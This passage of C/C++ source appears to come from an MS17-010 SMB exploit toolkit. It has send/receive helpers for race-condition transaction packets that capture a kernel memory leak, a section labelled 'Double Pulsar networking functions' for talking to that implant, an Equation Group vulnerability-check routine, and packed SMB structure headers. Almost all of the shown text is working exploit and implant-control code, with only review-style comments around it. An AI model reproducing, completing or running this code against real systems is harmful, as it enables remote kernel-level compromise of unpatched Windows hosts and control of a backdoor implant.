	 * Builds the request produced by trans_secondary_race_type_two_packet()
	 * (pid/uid/mid/tid all taken from info) into outbound->ThisPacket, sends
	 * it on s, receives up to 0x400 bytes into inbound->ThisPacket, re-homes
	 * the response into a buffer sized to the bytes read, and duplicates it
	 * into leak->KrnlLeakResponse.  The leak record is then carved up:
	 * ResponseHeader/ResponseNetbios point into the leak copy, while
	 * ResponseParameters/ResponseData are located through the
	 * ParameterOffset/DataOffset words of the transaction response.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, or either copy
	 * lacks the 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * The status arrays are static and only index 0 is ever written, so the
	 * value forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2], received[2];
	BUFFER scratch = { 0 };
	packet_creation_handler_type_one build = &trans_secondary_race_type_two_packet;
	PRESP_TRANSACTION transaction = NULL;

	if (isnull(outbound) || isnull(inbound) || isnull(info) || isnull(leak))
		return FALSE;

	if (badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;
	BUFFER* response = &inbound->ThisPacket;
	BUFFER* leakcopy = &leak->KrnlLeakResponse;

	if (isnull(build(request, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	PutUnsigned(received, RecvData(response, 0x400, s, GetUnsigned(received + 1)));
	if (GetUlong(received) == 0 || issockerr(GetUlong(received)))
		return FALSE;

	// Shrink the response buffer to the bytes actually read.
	bwsalloc(&scratch, GetUlong(received));
	cpy(scratch.pbdata, response->pbdata, scratch.dwsize);
	bwsfree(response);
	bwsalloc(response, scratch.dwsize);
	cpy(response->pbdata, scratch.pbdata, response->dwsize);
	bwsfree(&scratch);

	// Leak record gets its own copy of the (re-homed) response.
	bwsalloc(leakcopy, response->dwsize);
	cpy(leakcopy->pbdata, response->pbdata, leakcopy->dwsize);

	transaction = (PRESP_TRANSACTION)(leakcopy->pbdata + SMB_PARAM_OFFSET);

	inbound->ThisSmb = MAKEPSMB(response->pbdata + SMB_HEADER_OFFSET);
	inbound->ThisNetbiosSize = response->pbdata + NETBIOS_SIZE_OFFSET;

	// NOTE(review): DataOffset/ParameterOffset come from the server and are
	// not bounds-checked against leakcopy->dwsize here.
	leak->ResponseHeader = MAKEPSMB(leakcopy->pbdata + SMB_HEADER_OFFSET);
	leak->ResponseNetbios = MAKEPDWORD(leakcopy->pbdata);
	leak->ResponseData = MAKEPBYTE(leak->ResponseHeader) + transaction->DataOffset;
	leak->ResponseParameters = MAKEPBYTE(leak->ResponseHeader) + transaction->ParameterOffset;

	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);
	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;

	if (!cmp(leak->ResponseHeader->Protocol, "\xFFSMB", 4) || !cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
		return FALSE;

	return TRUE;
}
1175 |
BOOLEAN SendRecvTransSecondaryThirdMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Send-only helper: builds the request produced by
	 * trans_secondary_third_mid_zero_packet() (pid/uid/tid from info, mid 0)
	 * into outbound->ThisPacket and sends it on s.  No response is read:
	 * inbound's header/NetBIOS pointers are cleared to NULL and outbound's are
	 * refreshed and signature-checked.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, SendData reports 0 or a socket error, or the request
	 * buffer does not carry the 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * The status array is static and only index 0 is written, so the value
	 * forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2];
	packet_creation_handler_type_one build = &trans_secondary_third_mid_zero_packet;

	if (isnull(outbound) || isnull(inbound) || isnull(info) || badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;

	if (isnull(build(request, get_pid(info), get_uid(info), 0, get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	// Nothing was received for this step.
	inbound->ThisNetbiosSize = NULL;
	inbound->ThisSmb = MAKEPSMB(NULL);

	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);

	if (!cmp(outbound->ThisSmb->Protocol, "\xFFSMB", 4))
		return FALSE;

	return TRUE;
}
1211 |
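BOOLEAN SendRecvTransSecondarySecondRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Builds the request produced by trans_secondary_second_race_type_two_packet()
	 * (pid/uid/mid/tid from info) into outbound->ThisPacket, sends it on s,
	 * receives up to 0x400 bytes into inbound->ThisPacket, re-homes the
	 * response into a buffer sized to the bytes read, and duplicates it into
	 * leak->KrnlLeakResponse.  The leak record is then carved up:
	 * ResponseHeader/ResponseNetbios point into the leak copy, while
	 * ResponseParameters/ResponseData are located through the
	 * ParameterOffset/DataOffset words of the transaction response.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, the response is
	 * too short to contain an SMB header, or either copy lacks the
	 * 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * Two defects of the previous revision are corrected below: ResponseData
	 * was derived from ResponseHeader *before* ResponseHeader was assigned
	 * (i.e. from a stale or NULL pointer), and it used ParameterOffset where
	 * every sibling helper uses DataOffset.
	 */
	static unsigned int sendsize[2], recvsize[2];
	BUFFER tmp = { 0 };
	packet_creation_handler_type_one create_packet = &trans_secondary_second_race_type_two_packet;
	PRESP_TRANSACTION trans = NULL;

	// `leak` is dereferenced below, so guard it like the other race helpers.
	if (isnull(outbound) || isnull(inbound) || isnull(leak) || isnull(info))
		return FALSE;

	if (badsock(s))
		return FALSE;

	if (isnull(create_packet))
		return FALSE;

	BUFFER* srv = &outbound->ThisPacket;
	BUFFER* client = &inbound->ThisPacket;
	BUFFER* leakbws = &leak->KrnlLeakResponse;

	if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
		return FALSE;

	PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));

	if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
		return FALSE;

	PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));

	if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
		return FALSE;

	// The header is read at a fixed offset below; refuse a response that
	// cannot hold one rather than reading past the received bytes.
	if (GetUlong(recvsize) < SMB_HEADER_OFFSET + sizeof(SMB_HEADER))
		return FALSE;

	// Re-home the response into a buffer sized to the bytes actually read.
	bwsalloc(&tmp, GetUlong(recvsize));
	cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
	bwsfree(client);

	bwsalloc(client, tmp.dwsize);
	cpy(client->pbdata, tmp.pbdata, client->dwsize);
	bwsfree(&tmp);

	// Leak record gets its own copy of the re-homed response.
	bwsalloc(leakbws, client->dwsize);
	cpy(leakbws->pbdata, client->pbdata, leakbws->dwsize);

	outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);

	inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);

	trans = (PRESP_TRANSACTION)(leakbws->pbdata + SMB_PARAM_OFFSET);

	// Header first: the parameter/data pointers are offsets from it.
	leak->ResponseHeader = MAKEPSMB(leakbws->pbdata + SMB_HEADER_OFFSET);
	leak->ResponseNetbios = MAKEPDWORD(leakbws->pbdata);
	// NOTE(review): ParameterOffset/DataOffset are server-supplied and are not
	// checked against leakbws->dwsize here; consumers must bound their reads.
	leak->ResponseParameters = MAKEPBYTE(leak->ResponseHeader) + trans->ParameterOffset;
	leak->ResponseData = MAKEPBYTE(leak->ResponseHeader) + trans->DataOffset;

	if (!cmp(leak->ResponseHeader->Protocol, "\xFFSMB", 4) || !cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
		return FALSE;

	return TRUE;
}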
1270 |
BOOLEAN SendRecvTransSecondaryFourthMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Send-only helper: builds the request produced by
	 * trans_secondary_fourth_mid_zero_packet() (pid 10252, mid 0, uid/tid from
	 * info) into outbound->ThisPacket and sends it on s.  No response is read:
	 * outbound's header/NetBIOS pointers are refreshed and inbound's are
	 * cleared to NULL.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, or SendData reports 0 or a socket error; TRUE otherwise.
	 *
	 * The status array is static and only index 0 is written, so the value
	 * forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2];
	packet_creation_handler_type_one build = &trans_secondary_fourth_mid_zero_packet;

	if (isnull(outbound) || isnull(inbound) || isnull(info) || badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;

	if (isnull(build(request, 10252, get_uid(info), 0, get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);
	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;

	// Nothing was received for this step.
	inbound->ThisNetbiosSize = NULL;
	inbound->ThisSmb = NULL;

	return TRUE;
}
1301 |
BOOLEAN SendRecvTransSecondaryThirdRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Re-sends the request produced by trans_secondary_second_race_type_two_packet()
	 * (note: the *second* builder, with pid 0 and mid 0, uid/tid from info) from
	 * outbound->ThisPacket, receives up to 0x400 bytes into inbound->ThisPacket
	 * and re-homes the response into a buffer sized to the bytes read.  The
	 * leak copy in leak->KrnlLeakResponse is only (re)filled when it is still
	 * empty; an existing copy is left untouched and parsed as-is.  The leak
	 * record is then carved up: ResponseHeader/ResponseNetbios point into the
	 * leak copy, ResponseParameters/ResponseData are located through the
	 * ParameterOffset/DataOffset words of the transaction response.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, or either copy
	 * lacks the 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * The status arrays are static and only index 0 is written, so the value
	 * forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2], received[2];
	BUFFER scratch = { 0 };
	packet_creation_handler_type_one build = &trans_secondary_second_race_type_two_packet;
	PRESP_TRANSACTION transaction = NULL;

	if (isnull(inbound) || isnull(outbound) || isnull(info) || isnull(leak))
		return FALSE;

	if (badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;
	BUFFER* response = &inbound->ThisPacket;
	BUFFER* leakcopy = &leak->KrnlLeakResponse;

	if (isnull(build(request, 0, get_uid(info), 0, get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	PutUnsigned(received, RecvData(response, 0x400, s, GetUnsigned(received + 1)));
	if (GetUlong(received) == 0 || issockerr(GetUlong(received)))
		return FALSE;

	// Shrink the response buffer to the bytes actually read.
	bwsalloc(&scratch, GetUlong(received));
	cpy(scratch.pbdata, response->pbdata, scratch.dwsize);
	bwsfree(response);
	bwsalloc(response, scratch.dwsize);
	cpy(response->pbdata, scratch.pbdata, response->dwsize);
	bwsfree(&scratch);

	// Only an empty leak buffer is populated; presumably an earlier leak is
	// meant to survive this step - confirm against the callers.
	if (isnull(leakcopy->pbdata))
	{
		bwsalloc(leakcopy, response->dwsize);
		cpy(leakcopy->pbdata, response->pbdata, leakcopy->dwsize);
	}

	inbound->ThisNetbiosSize = response->pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(response->pbdata + SMB_HEADER_OFFSET);

	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);

	transaction = (PRESP_TRANSACTION)(leakcopy->pbdata + SMB_PARAM_OFFSET);

	// NOTE(review): ParameterOffset/DataOffset come from the server and are
	// not bounds-checked against leakcopy->dwsize here.
	leak->ResponseHeader = MAKEPSMB(leakcopy->pbdata + SMB_HEADER_OFFSET);
	leak->ResponseNetbios = MAKEPDWORD(leakcopy->pbdata);
	leak->ResponseParameters = MAKEPBYTE(leak->ResponseHeader) + transaction->ParameterOffset;
	leak->ResponseData = MAKEPBYTE(leak->ResponseHeader) + transaction->DataOffset;

	if (!cmp(leak->ResponseHeader->Protocol, "\xFFSMB", 4) || !cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
		return FALSE;

	return TRUE;
}
1363 |
BOOLEAN SendRecvSecondNtCreateAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Builds the request produced by nt_create_andx_second_packet() (pid 0,
	 * mid 0, uid/tid from info) into outbound->ThisPacket, sends it on s and
	 * receives up to 0x400 bytes into inbound->ThisPacket.  Unlike most of its
	 * siblings this helper does not re-home the response into an exactly-sized
	 * buffer; the header/NetBIOS pointers are derived from the receive buffer
	 * as is.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, or the response
	 * lacks the 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * The status arrays are static and only index 0 is written, so the value
	 * forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2], received[2];
	packet_creation_handler_type_one build = &nt_create_andx_second_packet;

	if (isnull(inbound) || isnull(outbound) || isnull(info) || badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;
	BUFFER* response = &inbound->ThisPacket;

	if (isnull(build(request, 0, get_uid(info), 0, get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	PutUnsigned(received, RecvData(response, 0x400, s, GetUnsigned(received + 1)));
	if (GetUlong(received) == 0 || issockerr(GetUlong(received)))
		return FALSE;

	inbound->ThisNetbiosSize = response->pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(response->pbdata + SMB_HEADER_OFFSET);

	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);

	return cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4) ? TRUE : FALSE;
}
1403 |
1404 |
1405 |
1406 |
1407 | /*
1408 | *
1409 | *
1410 | *
1411 | * Double Pulsar networking functions
1412 | *
1413 | *
1414 | *
1415 | */
1416 |
BOOLEAN SendRecvTrans2SessionSetup(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Builds the request produced by trans2_session_setup_packet()
	 * (pid/uid/mid/tid from info) into outbound->ThisPacket, sends it on s,
	 * receives up to 0x400 bytes into inbound->ThisPacket and re-homes the
	 * response into a buffer sized to the bytes read.  Header/NetBIOS pointers
	 * of both lists are refreshed afterwards.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, or the response
	 * lacks the 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * The status arrays are static and only index 0 is written, so the value
	 * forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2], received[2];
	BUFFER scratch = { 0 };
	packet_creation_handler_type_one build = &trans2_session_setup_packet;

	if (isnull(outbound) || isnull(inbound) || isnull(info) || badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;
	BUFFER* response = &inbound->ThisPacket;

	if (isnull(build(request, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	PutUnsigned(received, RecvData(response, 0x400, s, GetUnsigned(received + 1)));
	if (GetUlong(received) == 0 || issockerr(GetUlong(received)))
		return FALSE;

	// Shrink the response buffer to the bytes actually read.
	bwsalloc(&scratch, GetUlong(received));
	cpy(scratch.pbdata, response->pbdata, scratch.dwsize);
	bwsfree(response);
	bwsalloc(response, scratch.dwsize);
	cpy(response->pbdata, scratch.pbdata, response->dwsize);
	bwsfree(&scratch);

	// The response buffer has moved; re-derive the header/NetBIOS pointers.
	inbound->ThisNetbiosSize = response->pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(response->pbdata + SMB_HEADER_OFFSET);
	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);

	return cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4) ? TRUE : FALSE;
}
1464 |
BOOLEAN SendRecvTreeDisconnect(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Builds the request produced by tree_disconnect_packet()
	 * (pid/uid/mid/tid from info) into outbound->ThisPacket, sends it on s,
	 * receives up to 0x400 bytes into inbound->ThisPacket and re-homes the
	 * response into a buffer sized to the bytes read.  Header/NetBIOS pointers
	 * of both lists are refreshed afterwards.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, or the response
	 * lacks the 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * The status arrays are static and only index 0 is written, so the value
	 * forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2], received[2];
	BUFFER scratch = { 0 };
	packet_creation_handler_type_one build = &tree_disconnect_packet;

	if (isnull(outbound) || isnull(inbound) || isnull(info) || badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;
	BUFFER* response = &inbound->ThisPacket;

	if (isnull(build(request, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	PutUnsigned(received, RecvData(response, 0x400, s, GetUnsigned(received + 1)));
	if (GetUlong(received) == 0 || issockerr(GetUlong(received)))
		return FALSE;

	// Shrink the response buffer to the bytes actually read.
	bwsalloc(&scratch, GetUlong(received));
	cpy(scratch.pbdata, response->pbdata, scratch.dwsize);
	bwsfree(response);
	bwsalloc(response, scratch.dwsize);
	cpy(response->pbdata, scratch.pbdata, response->dwsize);
	bwsfree(&scratch);

	// The response buffer has moved; re-derive the header/NetBIOS pointers.
	inbound->ThisNetbiosSize = response->pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(response->pbdata + SMB_HEADER_OFFSET);
	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);

	return cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4) ? TRUE : FALSE;
}
1512 |
BOOLEAN SendRecvLogoffAndx(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Builds the request produced by logoff_andx_packet()
	 * (pid/uid/mid/tid from info) into outbound->ThisPacket, sends it on s,
	 * receives up to 0x400 bytes into inbound->ThisPacket and re-homes the
	 * response into a buffer sized to the bytes read.  Header/NetBIOS pointers
	 * of both lists are refreshed afterwards.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, or the response
	 * lacks the 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * The status arrays are static and only index 0 is written, so the value
	 * forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2], received[2];
	BUFFER scratch = { 0 };
	packet_creation_handler_type_one build = &logoff_andx_packet;

	if (isnull(outbound) || isnull(inbound) || isnull(info) || badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;
	BUFFER* response = &inbound->ThisPacket;

	if (isnull(build(request, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	PutUnsigned(received, RecvData(response, 0x400, s, GetUnsigned(received + 1)));
	if (GetUlong(received) == 0 || issockerr(GetUlong(received)))
		return FALSE;

	// Shrink the response buffer to the bytes actually read.
	bwsalloc(&scratch, GetUlong(received));
	cpy(scratch.pbdata, response->pbdata, scratch.dwsize);
	bwsfree(response);
	bwsalloc(response, scratch.dwsize);
	cpy(response->pbdata, scratch.pbdata, response->dwsize);
	bwsfree(&scratch);

	// The response buffer has moved; re-derive the header/NetBIOS pointers.
	inbound->ThisNetbiosSize = response->pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(response->pbdata + SMB_HEADER_OFFSET);
	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);

	return cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4) ? TRUE : FALSE;
}
1560 |
1561 | /*
1562 | *
1563 | *
1564 | *
1565 | * Equation Group MS17-10 vulnerability check networking function(s)
1566 | *
1567 | *
1568 | *
1569 | */
1570 |
BOOLEAN SendRecvTransPeekNamedPipeCheck(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Builds the request produced by trans_peek_namedpipe_check_packet()
	 * (pid/uid/mid/tid from info) into outbound->ThisPacket, sends it on s,
	 * receives up to 0x400 bytes into inbound->ThisPacket and re-homes the
	 * response into a buffer sized to the bytes read.  Header/NetBIOS pointers
	 * of both lists are refreshed afterwards; interpreting the response is
	 * left to the caller.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, or the response
	 * lacks the 0xFF 'S' 'M' 'B' signature; TRUE otherwise.
	 *
	 * The status arrays are static and only index 0 is written, so the value
	 * forwarded from index 1 is always 0 - kept as found.
	 */
	static unsigned int sent[2], received[2];
	BUFFER scratch = { 0 };
	packet_creation_handler_type_one build = &trans_peek_namedpipe_check_packet;

	if (isnull(outbound) || isnull(inbound) || isnull(info) || badsock(s) || isnull(build))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;
	BUFFER* response = &inbound->ThisPacket;

	if (isnull(build(request, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	PutUnsigned(received, RecvData(response, 0x400, s, GetUnsigned(received + 1)));
	if (GetUlong(received) == 0 || issockerr(GetUlong(received)))
		return FALSE;

	// Shrink the response buffer to the bytes actually read.
	bwsalloc(&scratch, GetUlong(received));
	cpy(scratch.pbdata, response->pbdata, scratch.dwsize);
	bwsfree(response);
	bwsalloc(response, scratch.dwsize);
	cpy(response->pbdata, scratch.pbdata, response->dwsize);
	bwsfree(&scratch);

	// The response buffer has moved; re-derive the header/NetBIOS pointers.
	inbound->ThisNetbiosSize = response->pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(response->pbdata + SMB_HEADER_OFFSET);
	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);

	return cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4) ? TRUE : FALSE;
}
1620 |
1621 | #pragma warning(pop)
--------------------------------------------------------------------------------
/ntcreateandx.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "sessionsetupandx.h"
3 |
4 | #pragma pack(push, 1)
5 |
// Wire layout of an NT_CREATE_ANDX request body (everything after the SMB
// header).  Declared inside #pragma pack(push, 1), so no padding is inserted
// and the fields map byte-for-byte onto the packet.  Field order is the
// packet format - do not reorder.
typedef struct REQ_NT_CREATE_ANDX
{
	BYTE WordCount;
	BYTE AndxCommand;
	BYTE AndxReserved;
	WORD AndxOffset;
	BYTE Reserved;
	WORD NameLength;
	DWORD Flags;
	DWORD RootDirectoryFID;
	DWORD DesiredAccess;
	LARGE_INTEGER AllocationSize;
	DWORD ExtFileAttributes;
	DWORD ShareAccess;
	DWORD CreateDisposition;
	DWORD CreateOptions;
	DWORD ImpersonationLevel;
	BYTE SecurityFlags;
	WORD ByteCount;
	BYTE Bytes[1];   // placeholder for the variable-length tail; real length is ByteCount (presumably)
}*PREQ_NT_CREATE_ANDX;
27 |
28 |
// Wire layout of the NT_CREATE_ANDX response words as this library reads
// them (packed, no padding).  Note there is no WordCount member here, unlike
// the request struct above; callers presumably point this at the byte after
// WordCount - confirm before relying on offsets.
typedef struct RESP_NT_CREATE_ANDX {
	BYTE AndxCommand;
	BYTE AndxReserved;
	WORD AndxOffset;
	BYTE OpLockLevel;
	WORD Fid;
	BYTE etc[1];   // placeholder for the remainder of the response
}*PRESP_NT_CREATE_ANDX;
37 |
38 |
39 | #pragma pack(pop)
40 |
41 |
--------------------------------------------------------------------------------
/sessionsetupandx.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "smbtransaction.h"
3 |
4 | #pragma pack(push, 1)
5 |
// Common 4-byte AndX chaining block shared by the request/response layouts in
// this header (packed, no padding).
typedef struct ANDX {
	BYTE AndxCommand;
	BYTE Reserved;
	WORD AndxOffset;
}*PANDX;
11 |
12 |
// Wire layout of a (pre-NT) SESSION_SETUP_ANDX request body, packed.
// The trailing anonymous union lets the first two bytes after ByteCount be
// read either as Password + Buffer or as a plain 2-byte array.
typedef struct _REQ_SESSIONSETUP_ANDX {
	BYTE WordCount;
	ANDX andx;
	WORD MaxBufferSize;
	WORD MaxMpxCount;
	WORD VcNumber;
	DWORD SessionKey;
	WORD PasswordLength;
	DWORD Reserved;
	WORD ByteCount;
	union {
		struct {
			BYTE Password;
			BYTE Buffer[1];   // placeholder for the variable-length tail
		};
		BYTE Bytes[2];
	};
}REQ_SESSIONSETUP_ANDX, * PREQ_SESSIONSETUP_ANDX;
31 |
// Wire layout of the NT-style SESSION_SETUP_ANDX request body, packed.
// Differs from _REQ_SESSIONSETUP_ANDX by carrying two password lengths and a
// Capabilities word.
typedef struct _REQ_NT_SESSIONSETUP_ANDX {
	BYTE WordCount;
	ANDX Andx;
	WORD MaxBufferSize;
	WORD MaxMpxCount;
	WORD VcNumber;
	DWORD SessionKey;
	WORD CaseInsensitivePasswordLength;
	WORD CaseSensitivePasswordLength;
	DWORD Reserved;
	DWORD Capabilities;
	WORD ByteCount;
	BYTE Buffer[1];   // placeholder for the variable-length tail
}REQ_NT_SESSIONSETUP_ANDX, * PREQ_NT_SESSIONSETUP_ANDX;
46 |
// Wire layout of a SESSION_SETUP_ANDX response body, packed.
typedef struct _RESP_SESSIONSETUP_ANDX {
	BYTE WordCount;
	ANDX Andx;
	WORD Action;
	WORD ByteCount;
	BYTE Buffer[1];   // placeholder for the variable-length tail
}RESP_SESSIONSETUP_ANDX, * PRESP_SESSIONSETUP_ANDX;
54 |
55 |
// Wire layout of a WRITE_ANDX request body, packed.  The anonymous union
// exposes the AndX block both as an ANDX struct and as its three raw fields.
typedef struct _REQ_WRITE_ANDX {
	BYTE WordCount;
	union {
		ANDX andx;
		struct {
			BYTE AndxCommand;
			BYTE AndxReserved;
			WORD AndxOffset;
		};
	};
	WORD Fid;
	DWORD Offset;
	DWORD Timeout;
	WORD WriteMode;
	WORD Remaining;
	WORD Reserved;
	WORD DataLength;
	WORD DataOffset;
	WORD ByteCount;
	BYTE Buffer[1];   // placeholder for the variable-length tail
}REQ_WRITE_ANDX, * PREQ_WRITE_ANDX;
77 |
// Wire layout of a WRITE_ANDX response body, packed.  No data buffer member:
// the response ends at ByteCount.
typedef struct _RESP_WRITE_ANDX {
	BYTE WordCount;
	//Words
	ANDX Andx;
	WORD Count;
	WORD Available;
	DWORD Reserved;
	//SMB_DATA
	WORD ByteCount;
}RESP_WRITE_ANDX, * PRESP_WRITE_ANDX;
88 |
89 | #pragma pack(pop)
